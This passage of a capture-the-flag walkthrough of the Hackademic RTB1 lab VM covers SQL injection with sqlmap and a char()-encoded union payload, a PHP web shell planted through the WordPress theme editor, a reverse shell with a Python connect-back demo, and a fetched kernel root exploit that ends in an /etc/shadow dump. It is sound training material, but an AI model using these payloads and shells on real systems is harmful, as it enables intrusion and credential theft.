
Databases

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --dbs
back-end DBMS: MySQL 5.0
[23:39:26] [INFO] fetching database names
[23:39:26] [INFO] the SQL query used returns 3 entries
[23:39:26] [INFO] retrieved: wordpress
[23:39:26] [INFO] retrieved: mysql
[23:39:26] [INFO] retrieved: information_schema

Tables

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress --tables
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

Columns of wp_users (wordpress)

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+

Dump of wp_users

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --dump
Database: wordpress
Table: wp_users
[6 entries]
(only six of the 22 columns are reproduced here)
+-------------------------+----------------+---------------+------------+--------------+----------------------------------+
| user_email              | user_firstname | user_lastname | user_level | user_login   | user_pass                        |
+-------------------------+----------------+---------------+------------+--------------+----------------------------------+
| MaxBucky@hacked.com     | Max            | Bucky         | 0          | MaxBucky     | b986448f0bb9e5e124ca91d3d650f52c |
| JasonKonnors@hacked.com | Jason          | Konnors       | 0          | JasonKonnors | a6e514f9486b83cb53d8d932f9a04292 |
| TonyBlack@hacked.com    | Tony           | Black         | 0          | TonyBlack    | 8601f6e1028a8e8a966f6c33fcd9aec4 |
| GeorgeMiller@hacked.com | George         | Miller        | 10         | GeorgeMiller | 7cbb3252ba6b7e9c422fac5334d22054 |
| JohnSmith@hacked        | John           | Smith         | 0          | JohnSmith    | 50484c19f1afdaf3841a0d821ed393d2 |
| NickJames@hacked.com    | Nick           | James         | 1          | NickJames    | 21232f297a57a5a743894a0e4a801fc3 |
+-------------------------+----------------+---------------+------------+--------------+----------------------------------+

user_level 10 marks GeorgeMiller as the administrator (WordPress 1.5 levels run from 0 to 10), which is why that account, and not NickJames with level 1, is used to log in later. Note also that the user_pass column in this dump does not line up with the per-row extraction done by hand: here MaxBucky is paired with b986448f... and JohnSmith with 50484c19..., while the concat(user_login,0x3a,user_pass) requests, which take login and hash from the same row, gave the reverse (likewise for TonyBlack and JasonKonnors). The two sources agree on NickJames and GeorgeMiller, and GeorgeMiller's is the only one validated by actually logging in. When two tools disagree like this, re-query one row at a time before putting credentials in a report.
Reading files with sqlmap

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/passwd
root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_passwd
(same listing as the load_file() dump of /etc/passwd above, from root:x:0:0:root:/root:/bin/bash down to mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash)

Operating system, distribution and version

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/issue
root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)

So the box runs Fedora 12: neither the "Fedora 13 (Goddard)" sqlmap inferred from the web server banner nor the "Fedora Core 6" nmap guessed from the TCP stack. Reading the file beats fingerprinting every time.

Environment variables

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/profile
root@bt:~/hackademic01# more /pentest/database/sqlmap/output/192.168.64.137/files/_etc_profile

# /etc/profile

# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrc

# It's NOT good idea to change this file unless you know what you
# are doing. Much better way is to create custom.sh shell script in
# /etc/profile.d/ to make custom changes to environment. This will
# prevent need for merging in future updates.

pathmunge () {
    if ! echo $PATH | /bin/egrep -q "(^|:)$1($|:)" ; then
       if [ "$2" = "after" ] ; then
          PATH=$PATH:$1
       else
          PATH=$1:$PATH
       fi
    fi
}

# ksh workaround
if [ -z "$EUID" -a -x /usr/bin/id ]; then
    EUID=`id -u`
    UID=`id -ru`
fi

# Path manipulation
if [ "$EUID" = "0" ]; then
    pathmunge /sbin
    pathmunge /usr/sbin
    pathmunge /usr/local/sbin
else
    pathmunge /usr/local/sbin after
    pathmunge /usr/sbin after
    pathmunge /sbin after
fi

if [ -x /usr/bin/id ]; then
    USER="`id -un`"
    LOGNAME=$USER
    MAIL="/var/spool/mail/$USER"
fi

HOSTNAME=`/bin/hostname 2>/dev/null`
HISTSIZE=1000
HISTCONTROL="ignoreboth"

export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE HISTCONTROL

for i in /etc/profile.d/*.sh ; do
    if [ -r "$i" ]; then
        if [ "$PS1" ]; then
            . $i
        else
            . $i >/dev/null 2>&1
        fi
    fi
done

unset i
unset pathmunge

Reading the web application's own files

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php

<?php
// ** MySQL settings ** //
define('DB_NAME', 'wordpress');     // The name of the database
define('DB_USER', 'root');          // Your MySQL username
define('DB_PASSWORD', 'lz5yedns');  // ...and password
define('DB_HOST', 'localhost');     // 99% chance you won't need to change this value
...etc...

The path is the default Fedora DocumentRoot (/var/www/html, confirmed by httpd.conf below) plus the directory name taken from the URL. DB_PASSWORD matches the password cracked from the MySQL hash, and DB_USER confirms the application really does connect as MySQL root.
httpd.conf with char()

http://192.168.64.137/Hackademic_RTB1/?cat=0 union select 1,load_file(char(47,101,116,99,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),3,4,5

(the char() sequence spells /etc/httpd/conf/httpd.conf)

httpd.conf with sqlmap

root@bt:~/hackademic01# python /pentest/database/sqlmap/sqlmap.py -u http://192.168.64.137/Hackademic_RTB1/?cat=1 --file-read=/etc/httpd/conf/httpd.conf

ServerTokens OS
ServerRoot "/etc/httpd"
PidFile run/httpd.pid
Timeout 120
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 15
<IfModule prefork.c>
StartServers       8
MinSpareServers    5
MaxSpareServers   20
ServerLimit      256
MaxClients       256
MaxRequestsPerChild  4000
</IfModule>
<IfModule worker.c>
StartServers         2
MaxClients         150
MinSpareThreads     25
MaxSpareThreads     75
ThreadsPerChild     25
MaxRequestsPerChild  0
</IfModule>
Listen 80
Include conf.d/*.conf
User apache
Group apache
ServerAdmin root@localhost
UseCanonicalName Off
DocumentRoot "/var/www/html"
<Directory />
    Options FollowSymLinks
    AllowOverride None
</Directory>
<Directory "/var/www/html">
    Options Indexes FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
DirectoryIndex index.html index.html.var
AccessFileName .htaccess
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
</Files>
HostnameLookups Off
ErrorLog logs/error_log
CustomLog logs/access_log combined
ServerSignature On
Alias /icons/ "/var/www/icons/"
<Directory "/var/www/icons">
    Options Indexes MultiViews FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
<IfModule mod_dav_fs.c>
    # Location of the WebDAV lock database.
    DAVLockDB /var/lib/dav/lockdb
</IfModule>
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
<Directory "/var/www/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>
Alias /error/ "/var/www/error/"
BrowserMatch "Mozilla/2" nokeepalive
BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
BrowserMatch "RealPlayer 4\.0" force-response-1.0
BrowserMatch "Java/1\.0" force-response-1.0
BrowserMatch "JDK/1\.0" force-response-1.0

Worth noting: the server runs as apache/apache, DocumentRoot is /var/www/html, Options Indexes is on for the whole DocumentRoot (directory listings wherever there is no index file, which is what nikto saw under /icons/), and ServerTokens OS with ServerSignature On is what leaks "Apache/2.2.15 (Fedora)" in every response and error page.
== Getting a shell through the WordPress admin ==

Log in to WordPress as GeorgeMiller / q1w2e3. Of the six accounts this is the one with user_level 10, the administrator level in WordPress 1.5 (NickJames, whose password is "admin", only has level 1), and only an administrator gets the theme editor.

The goal now is to gather more information and to modify or create files that let us run commands. Using the built-in theme editor, wp-content/themes/starburst/footer.php is replaced with:

<?php phpinfo(); ?>

Then footer.php is requested directly:

http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php

PHP Version 5.3.3
System: Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686
Build Date: Jul 22 2010 16:21:15
Loaded Configuration File: /etc/php.ini
Scan this dir for additional .ini files: /etc/php.d
Apache Version: Apache/2.2.15 (Fedora)
Server Administrator: root@localhost
Hostname:Port: localhost6.localdomain6:0
User/Group: apache(48)/489
HTTP_COOKIE: wordpressuser_1ba84d35a71d56fdf8eb2350c046e945=GeorgeMiller; wordpresspass_1ba84d35a71d56fdf8eb2350c046e945=604dfd4354c6e7727f873375f3c41e15
DOCUMENT_ROOT: /var/www/html
etc...

The theme editor can only write here because the theme directory is world-writable (drwxrwxrwx, as the shell below reports); on a properly deployed site the web server account cannot modify PHP files. Note also that phpinfo() echoes the caller's own cookies: the wordpresspass_* value is not the password but a hash derived from the stored hash, and a page that prints it to anyone who asks is a credential leak in itself.

Simple PHP shell

Replace the footer contents with:

<?php system($_REQUEST['cmd']); ?>

$_REQUEST means cmd is taken from the query string, a POST body or a cookie, whichever is most convenient.

http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php?cmd=ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:01:8A:4D
          inet addr:192.168.64.133  Bcast:192.168.64.255 etc......

http://192.168.64.137/Hackademic_RTB1/wp-content/themes/starburst/footer.php?cmd=uname -r
2.6.31.5-127.fc12.i686

(The ifconfig output shows .133 while the URL uses .137; the VM's DHCP lease changed between sessions.)

Full-featured PHP shell

Shell 1.31h 13-11-2011 03:34:03
[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
safe_mode: OFF
PHP version: 5.3.3
cURL: ON   MySQL: ON   MSSQL: OFF   PostgreSQL: OFF   Oracle: OFF
Disabled functions: NONE
Free space: 15.03 GB   Total space: 17.55 GB
uname -a : Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
sysctl : Linux 2.6.31.5-127.fc12.i686
$OSTYPE: linux-gnu
server: Apache/2.2.15 (Fedora)
id: uid=48(apache) gid=489(apache) groups=489(apache)
pwd: /var/www/html/Hackademic_RTB1/wp-content/themes/starburst ( drwxrwxrwx )

Commands run as apache (uid 48). safe_mode is off and no functions are disabled, so nothing in php.ini stands in the way of system().
== Reverse shell with netcat ==

On the attacking machine, listen on port 80 (outbound HTTP is the port most likely to be allowed by any egress filtering on the target):

nc -l -n -v -p 80
listening on [any] 80 ...

The command sent through the web shell to make the box connect back is not reproduced on this page. Once it runs, the listener receives the connection and the output of uname -a and id:

nc -l -n -v -p 80
listening on [any] 80 ...
connect to [192.168.64.1] from (UNKNOWN) [192.168.64.137] 42106
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
uid=48(apache) gid=489(apache) groups=489(apache)

The listener sat on 192.168.64.1, the VMware host rather than the BackTrack VM used for scanning. We are still apache, which is not enough:

cat /etc/shadow
cat: /etc/shadow: Permission denied
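The connect-back above is the whole trick of a reverse shell: the box, which accepts nothing inbound except port 80, opens a connection out to the attacker, who only has to listen. The following is an added example, not code from the Sec-Track page, that runs both ends on one machine so the exchange can be observed without a victim: listen() plays the attacker's nc -l -n -v -p 80, connect_back() plays what the web shell had to run on the box. Host, port and the command to run are assumptions for the demo (the lab used 192.168.64.1:80), and the one-shot command runner stands in for a real shell wired to the socket.

```python
"""Both ends of a connect-back shell, runnable on one machine.

Added example, not code from the Sec-Track page.  listen() plays the
attacker's `nc -l -n -v -p 80`; connect_back() plays what the web shell had
to run on the box.  Host, port and command are assumptions for the demo
(the lab used 192.168.64.1:80); the one-shot command runner stands in for
a real shell wired to the socket.
"""
import socket
import subprocess
import sys
import threading


def listen(host="127.0.0.1", port=0):
    """Bind and listen like `nc -l -p PORT`; port 0 lets the OS pick one."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def connect_back(host, port, argv):
    """Victim side: connect *out* to the listener, run argv, send back
    stdout+stderr, hang up.  The outbound direction is the whole point:
    inbound connections to the box are filtered, outbound to port 80 is not."""
    with socket.create_connection((host, port), timeout=10) as s:
        done = subprocess.run(argv, capture_output=True, text=True)
        s.sendall((done.stdout + done.stderr).encode())


def accept_output(srv, timeout=10):
    """Attacker side: wait for one connection and read until the peer closes."""
    srv.settimeout(timeout)
    conn, peer = srv.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return peer, b"".join(chunks).decode(errors="replace")


def demo(argv=None):
    """Run both ends on localhost and return what the listener received."""
    argv = argv or [sys.executable, "-c", "print('hello from the victim')"]
    srv = listen()
    port = srv.getsockname()[1]
    victim = threading.Thread(target=connect_back, args=("127.0.0.1", port, argv))
    victim.start()
    peer, output = accept_output(srv)
    victim.join()
    srv.close()
    return output


if __name__ == "__main__":
    print(demo([sys.executable, "-c", "import platform; print(platform.uname())"]))
```

On a real engagement the victim side is a one-liner fed to the web shell's cmd parameter and the listener is plain netcat; the shape of the exchange is exactly the one demo() shows, with the shell's stdin and stdout attached to the socket instead of a single command's output.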
== Privilege escalation ==

Exploit: Linux Kernel <= 2.6.36-rc8 RDS privilege escalation, CVE-2010-3904, by Dan Rosenberg <drosenberg@vsecurity.com>
http://www.vsecurity.com/resources/advisory/20101019-1/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3904

The running kernel, 2.6.31.5-127.fc12.i686, sits inside the affected range (RDS sockets exist since 2.6.30 and the fix landed in 2.6.36-rc8). The bug is in the RDS socket code, which copied data to user-supplied addresses without checking them; the exploit uses that to overwrite a kernel function pointer and call commit_creds(prepare_kernel_cred(0)). It relies on the rds module being loadable on demand, which is the default on Fedora, so besides updating the kernel the standard mitigation is to stop the module from loading (a modprobe rule such as install rds /bin/true). The box also had outbound internet access and a compiler, both of which made this step painless.

Fetched and built on the target through the shell:

wget http://www.vsecurity.com/download/tools/linux-rds-exploit.c
--2011-11-13 03:47:49--  http://www.vsecurity.com/download/tools/linux-rds-exploit.c
Resolving www.vsecurity.com... 209.67.252.12
Connecting to www.vsecurity.com|209.67.252.12|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6435 (6.3K) [text/x-c]
Saving to: `linux-rds-exploit.c'
0K ...... 100% 19.5K=0.3s
2011-11-13 03:47:50 (19.5 KB/s) - `linux-rds-exploit.c' saved [6435/6435]

gcc -o hackademic01 linux-rds-exploit.c

./hackademic01
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe0a21b20
[+] Resolved rds_ioctl to 0xe0a0c06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...

id
uid=0(root) gid=0(root)

cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::

Unlike the WordPress and MySQL hashes, these are salted SHA-512 crypt ($6$) and there is no need to crack them now that we are root.

ls /root
Desktop  anaconda-ks.cfg  key.txt  key.txt~

cp /root/key.txt /var/www/html/key.txt
# lynx http://192.168.64.137/key.txt

Yeah!! You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
http://p0wnbox.com